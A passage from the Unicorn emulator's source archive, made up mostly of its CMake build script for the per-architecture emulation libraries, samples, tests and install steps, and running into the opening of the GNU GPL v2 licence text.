-I${CMAKE_BINARY_DIR}/aarch64-softmmu -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/arm ) endif() if(UNICORN_TRACER) target_compile_options(aarch64-softmmu PRIVATE -DUNICORN_TRACER) endif() endif() if(UNICORN_HAS_M68K) add_library(m68k-softmmu STATIC ${UNICORN_ARCH_COMMON} qemu/target/m68k/cpu.c qemu/target/m68k/fpu_helper.c qemu/target/m68k/helper.c qemu/target/m68k/op_helper.c qemu/target/m68k/softfloat.c qemu/target/m68k/translate.c qemu/target/m68k/unicorn.c ) if(MSVC) target_compile_options(m68k-softmmu PRIVATE -DNEED_CPU_H /FIm68k.h /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/m68k-softmmu /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/m68k ) else() target_compile_options(m68k-softmmu PRIVATE -DNEED_CPU_H -include m68k.h -I${CMAKE_BINARY_DIR}/m68k-softmmu -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/m68k ) endif() if(UNICORN_TRACER) target_compile_options(m68k-softmmu PRIVATE -DUNICORN_TRACER) endif() endif() if(UNICORN_HAS_MIPS) add_library(mips-softmmu STATIC ${UNICORN_ARCH_COMMON} qemu/target/mips/cp0_helper.c qemu/target/mips/cp0_timer.c qemu/target/mips/cpu.c qemu/target/mips/dsp_helper.c qemu/target/mips/fpu_helper.c qemu/target/mips/helper.c qemu/target/mips/lmi_helper.c qemu/target/mips/msa_helper.c qemu/target/mips/op_helper.c qemu/target/mips/translate.c qemu/target/mips/unicorn.c ) if(MSVC) target_compile_options(mips-softmmu PRIVATE -DNEED_CPU_H /FImips.h /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/mips-softmmu /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/mips ) else() target_compile_options(mips-softmmu PRIVATE -DNEED_CPU_H -include mips.h -I${CMAKE_BINARY_DIR}/mips-softmmu -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/mips ) endif() if(UNICORN_TRACER) target_compile_options(mips-softmmu PRIVATE -DUNICORN_TRACER) endif() add_library(mipsel-softmmu STATIC ${UNICORN_ARCH_COMMON} qemu/target/mips/cp0_helper.c qemu/target/mips/cp0_timer.c qemu/target/mips/cpu.c qemu/target/mips/dsp_helper.c qemu/target/mips/fpu_helper.c qemu/target/mips/helper.c qemu/target/mips/lmi_helper.c qemu/target/mips/msa_helper.c qemu/target/mips/op_helper.c qemu/target/mips/translate.c qemu/target/mips/unicorn.c ) if(MSVC) target_compile_options(mipsel-softmmu PRIVATE -DNEED_CPU_H /FImipsel.h /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/mipsel-softmmu /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/mips ) else() target_compile_options(mipsel-softmmu PRIVATE -DNEED_CPU_H -include mipsel.h -I${CMAKE_BINARY_DIR}/mipsel-softmmu -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/mips ) endif() if(UNICORN_TRACER) target_compile_options(mipsel-softmmu PRIVATE -DUNICORN_TRACER) endif() add_library(mips64-softmmu STATIC ${UNICORN_ARCH_COMMON} qemu/target/mips/cp0_helper.c qemu/target/mips/cp0_timer.c qemu/target/mips/cpu.c qemu/target/mips/dsp_helper.c qemu/target/mips/fpu_helper.c qemu/target/mips/helper.c qemu/target/mips/lmi_helper.c qemu/target/mips/msa_helper.c qemu/target/mips/op_helper.c qemu/target/mips/translate.c qemu/target/mips/unicorn.c ) if(MSVC) target_compile_options(mips64-softmmu PRIVATE -DNEED_CPU_H /FImips64.h /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/mips64-softmmu /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/mips ) else() target_compile_options(mips64-softmmu PRIVATE -DNEED_CPU_H -include mips64.h -I${CMAKE_BINARY_DIR}/mips64-softmmu -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/mips ) endif() if(UNICORN_TRACER) target_compile_options(mips64-softmmu PRIVATE -DUNICORN_TRACER) endif() add_library(mips64el-softmmu STATIC ${UNICORN_ARCH_COMMON} qemu/target/mips/cp0_helper.c qemu/target/mips/cp0_timer.c qemu/target/mips/cpu.c qemu/target/mips/dsp_helper.c qemu/target/mips/fpu_helper.c qemu/target/mips/helper.c qemu/target/mips/lmi_helper.c qemu/target/mips/msa_helper.c qemu/target/mips/op_helper.c qemu/target/mips/translate.c qemu/target/mips/unicorn.c ) if(MSVC) target_compile_options(mips64el-softmmu PRIVATE -DNEED_CPU_H /FImips64el.h /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/mips64el-softmmu /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/mips ) else() target_compile_options(mips64el-softmmu PRIVATE -DNEED_CPU_H -include mips64el.h -I${CMAKE_BINARY_DIR}/mips64el-softmmu -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/mips ) endif() if(UNICORN_TRACER) target_compile_options(mips64el-softmmu PRIVATE -DUNICORN_TRACER) endif() endif() if(UNICORN_HAS_SPARC) add_library(sparc-softmmu STATIC ${UNICORN_ARCH_COMMON} qemu/target/sparc/cc_helper.c qemu/target/sparc/cpu.c qemu/target/sparc/fop_helper.c qemu/target/sparc/helper.c qemu/target/sparc/int32_helper.c qemu/target/sparc/ldst_helper.c qemu/target/sparc/mmu_helper.c qemu/target/sparc/translate.c qemu/target/sparc/win_helper.c qemu/target/sparc/unicorn.c ) if(MSVC) target_compile_options(sparc-softmmu PRIVATE -DNEED_CPU_H /FIsparc.h /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/sparc-softmmu /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/sparc ) else() target_compile_options(sparc-softmmu PRIVATE -DNEED_CPU_H -include sparc.h -I${CMAKE_BINARY_DIR}/sparc-softmmu -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/sparc ) endif() if(UNICORN_TRACER) target_compile_options(sparc-softmmu PRIVATE -DUNICORN_TRACER) endif() add_library(sparc64-softmmu STATIC ${UNICORN_ARCH_COMMON} qemu/target/sparc/cc_helper.c qemu/target/sparc/cpu.c qemu/target/sparc/fop_helper.c qemu/target/sparc/helper.c qemu/target/sparc/int64_helper.c qemu/target/sparc/ldst_helper.c qemu/target/sparc/mmu_helper.c qemu/target/sparc/translate.c qemu/target/sparc/vis_helper.c qemu/target/sparc/win_helper.c qemu/target/sparc/unicorn64.c ) if(MSVC) target_compile_options(sparc64-softmmu PRIVATE -DNEED_CPU_H /FIsparc64.h /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/sparc64-softmmu /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/sparc ) else() target_compile_options(sparc64-softmmu PRIVATE -DNEED_CPU_H -include sparc64.h -I${CMAKE_BINARY_DIR}/sparc64-softmmu -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/sparc ) endif() if(UNICORN_TRACER) target_compile_options(sparc64-softmmu PRIVATE -DUNICORN_TRACER) endif() endif() if(UNICORN_HAS_PPC) add_library(ppc-softmmu STATIC ${UNICORN_ARCH_COMMON} qemu/hw/ppc/ppc.c qemu/hw/ppc/ppc_booke.c qemu/libdecnumber/decContext.c qemu/libdecnumber/decNumber.c qemu/libdecnumber/dpd/decimal128.c qemu/libdecnumber/dpd/decimal32.c qemu/libdecnumber/dpd/decimal64.c qemu/target/ppc/cpu.c qemu/target/ppc/cpu-models.c qemu/target/ppc/dfp_helper.c qemu/target/ppc/excp_helper.c qemu/target/ppc/fpu_helper.c qemu/target/ppc/int_helper.c qemu/target/ppc/machine.c qemu/target/ppc/mem_helper.c qemu/target/ppc/misc_helper.c qemu/target/ppc/mmu-hash32.c qemu/target/ppc/mmu_helper.c qemu/target/ppc/timebase_helper.c qemu/target/ppc/translate.c qemu/target/ppc/unicorn.c ) if(MSVC) target_compile_options(ppc-softmmu PRIVATE -DNEED_CPU_H /FIppc.h /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/ppc-softmmu /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/ppc ) else() target_compile_options(ppc-softmmu PRIVATE -DNEED_CPU_H -include ppc.h -I${CMAKE_BINARY_DIR}/ppc-softmmu -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/ppc ) endif() if(UNICORN_TRACER) target_compile_options(ppc-softmmu PRIVATE -DUNICORN_TRACER) endif() add_library(ppc64-softmmu STATIC ${UNICORN_ARCH_COMMON} qemu/hw/ppc/ppc.c qemu/hw/ppc/ppc_booke.c qemu/libdecnumber/decContext.c qemu/libdecnumber/decNumber.c qemu/libdecnumber/dpd/decimal128.c qemu/libdecnumber/dpd/decimal32.c qemu/libdecnumber/dpd/decimal64.c qemu/target/ppc/compat.c qemu/target/ppc/cpu.c qemu/target/ppc/cpu-models.c qemu/target/ppc/dfp_helper.c qemu/target/ppc/excp_helper.c qemu/target/ppc/fpu_helper.c qemu/target/ppc/int_helper.c qemu/target/ppc/machine.c qemu/target/ppc/mem_helper.c qemu/target/ppc/misc_helper.c qemu/target/ppc/mmu-book3s-v3.c qemu/target/ppc/mmu-hash32.c qemu/target/ppc/mmu-hash64.c qemu/target/ppc/mmu_helper.c qemu/target/ppc/mmu-radix64.c qemu/target/ppc/timebase_helper.c qemu/target/ppc/translate.c qemu/target/ppc/unicorn.c ) if(MSVC) target_compile_options(ppc64-softmmu PRIVATE -DNEED_CPU_H /FIppc64.h /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/ppc64-softmmu /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/ppc ) else() target_compile_options(ppc64-softmmu PRIVATE -DNEED_CPU_H -include ppc64.h -I${CMAKE_BINARY_DIR}/ppc64-softmmu -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/ppc ) endif() if(UNICORN_TRACER) target_compile_options(ppc64-softmmu PRIVATE -DUNICORN_TRACER) endif() endif() if(UNICORN_HAS_RISCV) add_library(riscv32-softmmu STATIC ${UNICORN_ARCH_COMMON} qemu/target/riscv/cpu.c qemu/target/riscv/cpu_helper.c qemu/target/riscv/csr.c qemu/target/riscv/fpu_helper.c qemu/target/riscv/op_helper.c qemu/target/riscv/pmp.c qemu/target/riscv/translate.c qemu/target/riscv/unicorn.c ) if(MSVC) target_compile_options(riscv32-softmmu PRIVATE -DNEED_CPU_H /FIriscv32.h /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/riscv32-softmmu /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/riscv ) else() target_compile_options(riscv32-softmmu PRIVATE -DNEED_CPU_H -include riscv32.h -I${CMAKE_BINARY_DIR}/riscv32-softmmu -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/riscv ) endif() if(UNICORN_TRACER) target_compile_options(riscv32-softmmu PRIVATE -DUNICORN_TRACER) endif() add_library(riscv64-softmmu STATIC ${UNICORN_ARCH_COMMON} qemu/target/riscv/cpu.c qemu/target/riscv/cpu_helper.c qemu/target/riscv/csr.c qemu/target/riscv/fpu_helper.c qemu/target/riscv/op_helper.c qemu/target/riscv/pmp.c qemu/target/riscv/translate.c qemu/target/riscv/unicorn.c ) if(MSVC) target_compile_options(riscv64-softmmu PRIVATE -DNEED_CPU_H /FIriscv64.h /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/riscv64-softmmu /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/riscv ) else() target_compile_options(riscv64-softmmu PRIVATE -DNEED_CPU_H -include riscv64.h -I${CMAKE_BINARY_DIR}/riscv64-softmmu -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/riscv ) endif() if(UNICORN_TRACER) target_compile_options(riscv64-softmmu PRIVATE -DUNICORN_TRACER) endif() endif() if (UNICORN_HAS_S390X) add_library(s390x-softmmu STATIC ${UNICORN_ARCH_COMMON} qemu/hw/s390x/s390-skeys.c qemu/target/s390x/cc_helper.c qemu/target/s390x/cpu.c qemu/target/s390x/cpu_features.c qemu/target/s390x/cpu_models.c qemu/target/s390x/crypto_helper.c qemu/target/s390x/excp_helper.c qemu/target/s390x/fpu_helper.c qemu/target/s390x/helper.c qemu/target/s390x/interrupt.c qemu/target/s390x/int_helper.c qemu/target/s390x/ioinst.c qemu/target/s390x/mem_helper.c qemu/target/s390x/misc_helper.c qemu/target/s390x/mmu_helper.c qemu/target/s390x/sigp.c qemu/target/s390x/tcg-stub.c qemu/target/s390x/translate.c qemu/target/s390x/vec_fpu_helper.c qemu/target/s390x/vec_helper.c qemu/target/s390x/vec_int_helper.c qemu/target/s390x/vec_string_helper.c qemu/target/s390x/unicorn.c ) if(MSVC) target_compile_options(s390x-softmmu PRIVATE -DNEED_CPU_H /FIs390x.h /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/s390x-softmmu /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/s390x ) else() target_compile_options(s390x-softmmu PRIVATE -DNEED_CPU_H -include s390x.h -I${CMAKE_BINARY_DIR}/s390x-softmmu -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/s390x ) endif() endif() if (UNICORN_HAS_TRICORE) add_library(tricore-softmmu STATIC ${UNICORN_ARCH_COMMON} qemu/target/tricore/cpu.c qemu/target/tricore/fpu_helper.c qemu/target/tricore/helper.c qemu/target/tricore/op_helper.c qemu/target/tricore/translate.c qemu/target/tricore/unicorn.c ) if(MSVC) target_compile_options(tricore-softmmu PRIVATE -DNEED_CPU_H /FItricore.h /I${CMAKE_CURRENT_SOURCE_DIR}/msvc/tricore-softmmu /I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/tricore ) else() target_compile_options(tricore-softmmu PRIVATE -DNEED_CPU_H -include tricore.h -I${CMAKE_BINARY_DIR}/tricore-softmmu -I${CMAKE_CURRENT_SOURCE_DIR}/qemu/target/tricore ) endif() endif() set(UNICORN_SRCS uc.c qemu/softmmu/vl.c qemu/hw/core/cpu.c ) set(UNICORN_COMMON_SRCS list.c glib_compat/glib_compat.c glib_compat/gtestutils.c glib_compat/garray.c glib_compat/gtree.c glib_compat/grand.c glib_compat/glist.c glib_compat/gmem.c glib_compat/gpattern.c glib_compat/gslice.c qemu/util/bitmap.c qemu/util/bitops.c qemu/util/crc32c.c qemu/util/cutils.c qemu/util/getauxval.c qemu/util/guest-random.c qemu/util/host-utils.c qemu/util/osdep.c qemu/util/qdist.c qemu/util/qemu-timer.c qemu/util/qemu-timer-common.c qemu/util/range.c qemu/util/qht.c qemu/util/pagesize.c qemu/util/cacheinfo.c qemu/crypto/aes.c ) # A workaround to avoid circle dependency between unicorn and *-softmmu if(MSVC) set(UNICORN_COMMON_SRCS ${UNICORN_COMMON_SRCS} qemu/util/oslib-win32.c qemu/util/qemu-thread-win32.c ) if(CMAKE_SIZEOF_VOID_P EQUAL 8) if(MSVC_VERSION LESS 1600 AND MSVC_IDE) add_custom_command(OUTPUT "${CMAKE_CURRENT_SOURCE_DIR}/build/setjmp-wrapper-win32.dir/setjmp-wrapper-win32.obj" COMMAND ml64 /c /nologo /Fo"${CMAKE_CURRENT_SOURCE_DIR}/build/setjmp-wrapper-win32.dir/setjmp-wrapper-win32.obj" /W3 /errorReport:prompt /Ta"${CMAKE_CURRENT_SOURCE_DIR}/qemu/util/setjmp-wrapper-win32.asm" DEPENDS "${CMAKE_CURRENT_SOURCE_DIR}/qemu/util/setjmp-wrapper-win32.asm" ) set(UNICORN_SRCS ${UNICORN_SRCS} "${CMAKE_CURRENT_SOURCE_DIR}/build/setjmp-wrapper-win32.dir/setjmp-wrapper-win32.obj") else() enable_language(ASM_MASM) endif() set(UNICORN_COMMON_SRCS ${UNICORN_COMMON_SRCS} qemu/util/setjmp-wrapper-win32.asm) set_property(SOURCE qemu/util/setjmp-wrapper-win32.asm PROPERTY LANGUAGE ASM_MASM) endif() else() set(UNICORN_COMMON_SRCS ${UNICORN_COMMON_SRCS} qemu/util/oslib-posix.c qemu/util/qemu-thread-posix.c ) endif() add_library(unicorn-common STATIC ${UNICORN_COMMON_SRCS} ) set_target_properties(unicorn-common PROPERTIES C_VISIBILITY_PRESET hidden) if(NOT MSVC AND NOT ANDROID_ABI) target_link_libraries(unicorn-common PRIVATE pthread) endif() add_library(unicorn ${UNICORN_SRCS}) # For static archive if (BUILD_SHARED_LIBS) add_library(unicorn_static STATIC ${UNICORN_SRCS}) endif() if(BUILD_SHARED_LIBS) if(ANDROID_ABI) file(APPEND ${CMAKE_BINARY_DIR}/adb.sh "adb push ./libunicorn.so /data/local/tmp/build/\n") endif() endif() set(UNICORN_LINK_LIBRARIES ${UNICORN_LINK_LIBRARIES} unicorn-common) if (ATOMIC_LINKAGE_FIX) set(UNICORN_COMPILE_OPTIONS ${UNICORN_COMPILE_OPTIONS} -latomic) endif() if(UNICORN_HAS_X86) set(UNICORN_COMPILE_OPTIONS ${UNICORN_COMPILE_OPTIONS} -DUNICORN_HAS_X86) set(UNICORN_LINK_LIBRARIES ${UNICORN_LINK_LIBRARIES} x86_64-softmmu) set(UNICORN_SAMPLE_FILE ${UNICORN_SAMPLE_FILE} sample_x86 sample_x86_32_gdt_and_seg_regs sample_batch_reg mem_apis shellcode sample_mmu) target_link_libraries(x86_64-softmmu PRIVATE unicorn-common) set(UNICORN_TEST_FILE ${UNICORN_TEST_FILE} test_x86) endif() if(UNICORN_HAS_ARM) set(UNICORN_COMPILE_OPTIONS ${UNICORN_COMPILE_OPTIONS} -DUNICORN_HAS_ARM) set(UNICORN_LINK_LIBRARIES ${UNICORN_LINK_LIBRARIES} arm-softmmu) set(UNICORN_SAMPLE_FILE ${UNICORN_SAMPLE_FILE} sample_arm) target_link_libraries(arm-softmmu PRIVATE unicorn-common) set(UNICORN_TEST_FILE ${UNICORN_TEST_FILE} test_arm) endif() if(UNICORN_HAS_AARCH64) set(UNICORN_COMPILE_OPTIONS ${UNICORN_COMPILE_OPTIONS} -DUNICORN_HAS_ARM64) set(UNICORN_LINK_LIBRARIES ${UNICORN_LINK_LIBRARIES} aarch64-softmmu) set(UNICORN_SAMPLE_FILE ${UNICORN_SAMPLE_FILE} sample_arm64) target_link_libraries(aarch64-softmmu PRIVATE unicorn-common) set(UNICORN_TEST_FILE ${UNICORN_TEST_FILE} test_arm64) endif() if(UNICORN_HAS_M68K) set(UNICORN_COMPILE_OPTIONS ${UNICORN_COMPILE_OPTIONS} -DUNICORN_HAS_M68K) set(UNICORN_LINK_LIBRARIES ${UNICORN_LINK_LIBRARIES} m68k-softmmu) set(UNICORN_SAMPLE_FILE ${UNICORN_SAMPLE_FILE} sample_m68k) target_link_libraries(m68k-softmmu PRIVATE unicorn-common) set(UNICORN_TEST_FILE ${UNICORN_TEST_FILE} test_m68k) endif() if(UNICORN_HAS_MIPS) set(UNICORN_COMPILE_OPTIONS ${UNICORN_COMPILE_OPTIONS} -DUNICORN_HAS_MIPS -DUNICORN_HAS_MIPSEL -DUNICORN_HAS_MIPS64 -DUNICORN_HAS_MIPS64EL) set(UNICORN_LINK_LIBRARIES ${UNICORN_LINK_LIBRARIES} mips-softmmu mipsel-softmmu mips64-softmmu mips64el-softmmu) set(UNICORN_SAMPLE_FILE ${UNICORN_SAMPLE_FILE} sample_mips) target_link_libraries(mips-softmmu PRIVATE unicorn-common) target_link_libraries(mipsel-softmmu PRIVATE unicorn-common) target_link_libraries(mips64-softmmu PRIVATE unicorn-common) target_link_libraries(mips64el-softmmu PRIVATE unicorn-common) set(UNICORN_TEST_FILE ${UNICORN_TEST_FILE} test_mips) endif() if(UNICORN_HAS_SPARC) set(UNICORN_COMPILE_OPTIONS ${UNICORN_COMPILE_OPTIONS} -DUNICORN_HAS_SPARC) set(UNICORN_LINK_LIBRARIES ${UNICORN_LINK_LIBRARIES} sparc-softmmu sparc64-softmmu) set(UNICORN_SAMPLE_FILE ${UNICORN_SAMPLE_FILE} sample_sparc) target_link_libraries(sparc-softmmu PRIVATE unicorn-common) target_link_libraries(sparc64-softmmu PRIVATE unicorn-common) set(UNICORN_TEST_FILE ${UNICORN_TEST_FILE} test_sparc) endif() if(UNICORN_HAS_PPC) set(UNICORN_COMPILE_OPTIONS ${UNICORN_COMPILE_OPTIONS} -DUNICORN_HAS_PPC) set(UNICORN_LINK_LIBRARIES ${UNICORN_LINK_LIBRARIES} ppc-softmmu ppc64-softmmu) set(UNICORN_SAMPLE_FILE ${UNICORN_SAMPLE_FILE} sample_ppc) target_link_libraries(ppc-softmmu PRIVATE unicorn-common) target_link_libraries(ppc64-softmmu PRIVATE unicorn-common) set(UNICORN_TEST_FILE ${UNICORN_TEST_FILE} test_ppc) endif() if(UNICORN_HAS_RISCV) set(UNICORN_COMPILE_OPTIONS ${UNICORN_COMPILE_OPTIONS} -DUNICORN_HAS_RISCV) set(UNICORN_LINK_LIBRARIES ${UNICORN_LINK_LIBRARIES} riscv32-softmmu riscv64-softmmu) set(UNICORN_SAMPLE_FILE ${UNICORN_SAMPLE_FILE} sample_riscv) target_link_libraries(riscv32-softmmu PRIVATE unicorn-common) target_link_libraries(riscv64-softmmu PRIVATE unicorn-common) set(UNICORN_TEST_FILE ${UNICORN_TEST_FILE} test_riscv) endif() if (UNICORN_HAS_S390X) set(UNICORN_COMPILE_OPTIONS ${UNICORN_COMPILE_OPTIONS} -DUNICORN_HAS_S390X) set(UNICORN_LINK_LIBRARIES ${UNICORN_LINK_LIBRARIES} s390x-softmmu) set(UNICORN_SAMPLE_FILE ${UNICORN_SAMPLE_FILE} sample_s390x) target_link_libraries(s390x-softmmu PRIVATE unicorn-common) set(UNICORN_TEST_FILE ${UNICORN_TEST_FILE} test_s390x) endif() if (UNICORN_HAS_TRICORE) set(UNICORN_COMPILE_OPTIONS ${UNICORN_COMPILE_OPTIONS} -DUNICORN_HAS_TRICORE) set(UNICORN_LINK_LIBRARIES ${UNICORN_LINK_LIBRARIES} tricore-softmmu) set(UNICORN_SAMPLE_FILE ${UNICORN_SAMPLE_FILE} sample_tricore) target_link_libraries(tricore-softmmu unicorn-common) set(UNICORN_TEST_FILE ${UNICORN_TEST_FILE} test_tricore) endif() # Extra tests set(UNICORN_TEST_FILE ${UNICORN_TEST_FILE} test_mem) set(UNICORN_TEST_FILE ${UNICORN_TEST_FILE} test_ctl) set(UNICORN_SAMPLE_FILE ${UNICORN_SAMPLE_FILE} sample_ctl) if(UNICORN_TRACER) target_compile_options(unicorn-common PRIVATE -DUNICORN_TRACER) target_compile_options(unicorn PRIVATE -DUNICORN_TRACER) endif() target_compile_options(unicorn-common PRIVATE ${UNICORN_COMPILE_OPTIONS} ) target_compile_options(unicorn PRIVATE ${UNICORN_COMPILE_OPTIONS} ) # For static archive if (BUILD_SHARED_LIBS) target_compile_options(unicorn_static PRIVATE ${UNICORN_COMPILE_OPTIONS} ) endif() if(MINGW) set(UNICORN_LINK_LIBRARIES ${UNICORN_LINK_LIBRARIES} pthread) endif() if(ATOMIC_LINKAGE_FIX) set(UNICORN_LINK_LIBRARIES ${UNICORN_LINK_LIBRARIES} atomic) endif() if(MSVC) if(BUILD_SHARED_LIBS) target_compile_options(unicorn PRIVATE -DUNICORN_SHARED ) # For static archive target_link_libraries(unicorn_static PRIVATE ${UNICORN_LINK_LIBRARIES} ) endif() target_link_libraries(unicorn PRIVATE ${UNICORN_LINK_LIBRARIES} ) set_target_properties(unicorn PROPERTIES VERSION "${UNICORN_VERSION_MAJOR}.${UNICORN_VERSION_MINOR}" ) else() target_link_libraries(unicorn PRIVATE ${UNICORN_LINK_LIBRARIES} m ) target_link_libraries(unicorn PUBLIC m ) # For static archive if (BUILD_SHARED_LIBS) target_link_libraries(unicorn_static PUBLIC m ) target_link_libraries(unicorn_static PRIVATE ${UNICORN_LINK_LIBRARIES} m ) endif() set_target_properties(unicorn PROPERTIES VERSION ${UNICORN_VERSION_MAJOR} SOVERSION ${UNICORN_VERSION_MAJOR} ) endif() if(MSVC) set(SAMPLES_LIB unicorn ) elseif(NOT ANDROID_ABI) set(SAMPLES_LIB unicorn pthread ) else() set(SAMPLES_LIB unicorn ) endif() if(ATOMIC_LINKAGE_FIX) set(SAMPLES_LIB ${SAMPLES_LIB} atomic ) endif() target_include_directories(unicorn PUBLIC include ) # For static archive if (BUILD_SHARED_LIBS) target_include_directories(unicorn_static PUBLIC include ) endif() # Black magic for generating static archives... if (BUILD_SHARED_LIBS) if (MSVC) # Avoid the import lib built by MVSC clash with our archive. set_target_properties(unicorn PROPERTIES ARCHIVE_OUTPUT_NAME "unicorn-import") endif() bundle_static_library(unicorn_static unicorn_archive unicorn) else() # Rename the "static" lib to avoid filename clash. set_target_properties(unicorn PROPERTIES OUTPUT_NAME "unicorn-static") bundle_static_library(unicorn unicorn_archive unicorn) endif() if(UNICORN_FUZZ) set(UNICORN_FUZZ_SUFFIX "arm_arm;arm_armbe;arm_thumb;arm64_arm;arm64_armbe;m68k_be;mips_32be;mips_32le;sparc_32be;x86_16;x86_32;x86_64;s390x_be") if (NOT APPLE) set(SAMPLES_LIB ${SAMPLES_LIB} rt) endif() foreach(SUFFIX ${UNICORN_FUZZ_SUFFIX}) add_executable(fuzz_emu_${SUFFIX} ${CMAKE_CURRENT_SOURCE_DIR}/tests/fuzz/fuzz_emu_${SUFFIX}.c ${CMAKE_CURRENT_SOURCE_DIR}/tests/fuzz/onedir.c ) target_link_libraries(fuzz_emu_${SUFFIX} PRIVATE ${SAMPLES_LIB} ) endforeach() endif() if(UNICORN_BUILD_TESTS) enable_testing() foreach(SAMPLE_FILE ${UNICORN_SAMPLE_FILE}) add_executable(${SAMPLE_FILE} ${CMAKE_CURRENT_SOURCE_DIR}/samples/${SAMPLE_FILE}.c ) target_link_libraries(${SAMPLE_FILE} PRIVATE ${SAMPLES_LIB} ) endforeach() foreach(TEST_FILE ${UNICORN_TEST_FILE}) add_executable(${TEST_FILE} ${CMAKE_CURRENT_SOURCE_DIR}/tests/unit/${TEST_FILE}.c ) target_compile_options(${TEST_FILE} PRIVATE ${UNICORN_COMPILE_OPTIONS} ) target_link_libraries(${TEST_FILE} PRIVATE ${SAMPLES_LIB} ) add_test(${TEST_FILE} ${TEST_FILE}) if(ANDROID_ABI) file(APPEND ${CMAKE_BINARY_DIR}/adb.sh "adb push ${TEST_FILE} /data/local/tmp/build/\n") file(APPEND ${CMAKE_BINARY_DIR}/adb.sh "adb shell \"chmod +x /data/local/tmp/build/${TEST_FILE}\"\n") file(APPEND ${CMAKE_BINARY_DIR}/adb.sh "adb shell \'LD_LIBRARY_PATH=/data/local/tmp/build:$LD_LIBRARY_PATH /data/local/tmp/build/${TEST_FILE}\' || exit -1\n") endif() if (UNICORN_TARGET_ARCH STREQUAL "aarch64" OR UNICORN_TARGET_ARCH STREQUAL "ppc") target_compile_definitions(${TEST_FILE} PRIVATE TARGET_READ_INLINED) endif() endforeach() endif() if(UNICORN_INSTALL AND NOT MSVC) include("GNUInstallDirs") file(GLOB UNICORN_HEADERS ${CMAKE_CURRENT_SOURCE_DIR}/include/unicorn/*.h) if (BUILD_SHARED_LIBS) install(TARGETS unicorn RUNTIME DESTINATION ${CMAKE_INSTALL_BINDIR} ARCHIVE DESTINATION ${CMAKE_INSTALL_LIBDIR} LIBRARY DESTINATION ${CMAKE_INSTALL_LIBDIR} ) endif() install(FILES $ DESTINATION ${CMAKE_INSTALL_LIBDIR}) install(FILES ${UNICORN_HEADERS} DESTINATION ${CMAKE_INSTALL_INCLUDEDIR}/unicorn) if (ATOMIC_LINKAGE_FIX) set(ATOMIC_LINK_PKG_CONFIG " -latomic") else() set(ATOMIC_LINK_PKG_CONFIG "") endif() file(WRITE ${CMAKE_BINARY_DIR}/unicorn.pc "Name: unicorn\n\ Description: Unicorn emulator engine\n\ Version: ${UNICORN_VERSION_MAJOR}.${UNICORN_VERSION_MINOR}.${UNICORN_VERSION_PATCH}\n\ libdir=${CMAKE_INSTALL_FULL_LIBDIR}\n\ includedir=${CMAKE_INSTALL_FULL_INCLUDEDIR}\n\ Libs: -L\$\{libdir\} -lunicorn\n\ Libs.private: -lpthread -lm${ATOMIC_LINK_PKG_CONFIG}\n\ Cflags: -I\$\{includedir\}\n" ) install(FILES ${CMAKE_BINARY_DIR}/unicorn.pc DESTINATION ${CMAKE_INSTALL_LIBDIR}/pkgconfig) endif() unicorn-2.1.1/COPYING000066400000000000000000000431101467524106700142360ustar00rootroot00000000000000 GNU GENERAL PUBLIC LICENSE Version 2, June 1991 Copyright (C) 1989, 1991 Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. Preamble The licenses for most software are designed to take away your freedom to share and change it. By contrast, the GNU General Public License is intended to guarantee your freedom to share and change free software--to make sure the software is free for all its users. This General Public License applies to most of the Free Software Foundation's software and to any other program whose authors commit to using it. (Some other Free Software Foundation software is covered by the GNU Lesser General Public License instead.) You can apply it to your programs, too. When we speak of free software, we are referring to freedom, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for this service if you wish), that you receive source code or can get it if you want it, that you can change the software or use pieces of it in new free programs; and that you know you can do these things. To protect your rights, we need to make restrictions that forbid anyone to deny you these rights or to ask you to surrender the rights. These restrictions translate to certain responsibilities for you if you distribute copies of the software, or if you modify it. For example, if you distribute copies of such a program, whether gratis or for a fee, you must give the recipients all the rights that you have. You must make sure that they, too, receive or can get the source code. And you must show them these terms so they know their rights. We protect your rights with two steps: (1) copyright the software, and (2) offer you this license which gives you legal permission to copy, distribute and/or modify the software. Also, for each author's protection and ours, we want to make certain that everyone understands that there is no warranty for this free software. If the software is modified by someone else and passed on, we want its recipients to know that what they have is not the original, so that any problems introduced by others will not reflect on the original authors' reputations. Finally, any free program is threatened constantly by software patents. We wish to avoid the danger that redistributors of a free program will 